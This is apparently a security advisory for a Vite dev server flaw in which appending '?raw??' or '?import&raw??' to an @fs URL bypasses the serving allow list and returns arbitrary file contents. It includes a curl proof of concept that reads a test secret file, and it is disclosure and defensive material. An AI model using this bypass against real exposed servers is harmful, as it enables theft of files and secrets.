### SummaryThe contents of arbitrary files can be returned to the browser.### ImpactOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.### Details`@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes.### PoC```bash$ npm create vite@latest$ cd vite-project/$ npm install$ npm run dev$ echo "top secret content" > /tmp/secret.txt# expected behaviour$ curl "http://localhost:5173/@fs/tmp/secret.txt"

403 Restricted

The request url "/tmp/secret.txt" is outside of Vite serving allow list.# security bypassed$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"export default "top secret content\n"//# sourceMappingURL=data:application/json;base64,eyJ2...```